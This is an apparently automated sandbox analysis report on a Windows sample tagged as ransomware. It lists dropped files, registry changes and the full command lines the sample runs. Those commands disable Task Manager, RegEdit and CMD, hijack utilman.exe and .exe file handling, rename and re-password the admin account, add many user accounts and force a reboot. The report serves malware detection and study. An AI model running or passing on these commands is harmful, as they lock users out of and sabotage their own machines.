Malware Analysis Report

2024-10-24 18:18

Sample ID 241018-c1w8va1hlh
Target b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
SHA256 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
Tags
evasion persistence privilege_escalation ransomware
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f

Threat Level: Likely malicious

The file b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence privilege_escalation ransomware

Event Triggered Execution: Image File Execution Options Injection

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Checks computer location settings

Drops file in System32 directory

Sets desktop wallpaper using registry

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Accessibility Features

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Runs net.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:33

Reported

2024-10-18 02:33

Platform

win7-20241010-en

Max time kernel

4s

Max time network

5s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" C:\Windows\system32\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_259416886 C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command C:\Windows\System32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe C:\Windows\System32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" C:\Windows\System32\cmd.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2828 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2740 wrote to memory of 2304 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1152 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 632 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 3016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 3068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2304 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1228 wrote to memory of 2552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2304 wrote to memory of 2548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d <binary data omitted> /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\WMIC.exe

wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"

C:\Windows\system32\net.exe

net user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net.exe

net user T3yZrQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T3yZrQ Maxcheto /add

C:\Windows\system32\net.exe

net user 8rJpX1 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add

C:\Windows\system32\net.exe

net user 9MaL2Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add

C:\Windows\system32\net.exe

net user K4$dF27 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user K4$dF27 Maxcheto /add

C:\Windows\system32\net.exe

net user xC78RT Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user xC78RT Maxcheto /add

C:\Windows\system32\net.exe

net user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net.exe

net user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net.exe

net user R2xD1B Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user R2xD1B Maxcheto /add

C:\Windows\system32\net.exe

net user m14T8z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user m14T8z Maxcheto /add

C:\Windows\system32\net.exe

net user L27w8G Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user L27w8G Maxcheto /add

C:\Windows\system32\net.exe

net user P9dR2Y Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user P9dR2Y Maxcheto /add

C:\Windows\system32\net.exe

net user 5QL71t Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5QL71t Maxcheto /add

C:\Windows\system32\net.exe

net user r8B6V3F Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user r8B6V3F Maxcheto /add

C:\Windows\system32\net.exe

net user 7CXz1b Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7CXz1b Maxcheto /add

C:\Windows\system32\net.exe

net user n38vJQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user n38vJQ Maxcheto /add

C:\Windows\system32\net.exe

net user x6G7P1L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x6G7P1L Maxcheto /add

C:\Windows\system32\net.exe

net user M239Wk Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user M239Wk Maxcheto /add

C:\Windows\system32\net.exe

net user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net.exe

net user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net.exe

net user t93V6D Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user t93V6D Maxcheto /add

C:\Windows\system32\net.exe

net user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net.exe

net user x9K1P7L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x9K1P7L Maxcheto /add

C:\Windows\system32\net.exe

net user z7R4M3 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user z7R4M3 Maxcheto /add

C:\Windows\system32\shutdown.exe

shutdown /r /f /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

MD5 7c652236d1e09a76cfc27cb2611b80ad
SHA1 f9c359054835b06308165e110cdc5229d4fda8fb
SHA256 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c
SHA512 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

MD5 7835d8ae389b8b78ea4d06c024d63849
SHA1 5a0196e67a8af7185b372aacf5ad817a26546ad1
SHA256 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1
SHA512 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372

C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png

MD5 44055016d847ddbd0e8f0a56ea2a0ba6
SHA1 cb4e3dfdb804aebb78c96100b42b29db28d902cd
SHA256 2fa62a6d8816d3a7f45a371449ef044851556f6d38fc5030be3f58a25ccbd7f2
SHA512 3edee078f8221c4ff1da59215dcc8e2144db74c5679e386645c3c3a34038cc23f11f83ba86efeeb94f3b01ec90dc72d83da1a09c91cb0cb02d8019c5d226b9c4

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

MD5 4947724257526b4226e21ae7541822cd
SHA1 af4db735de48a5069e70758bdfdf41a8214aa346
SHA256 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba
SHA512 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

MD5 2f368b76ab153329fb42db70493474b1
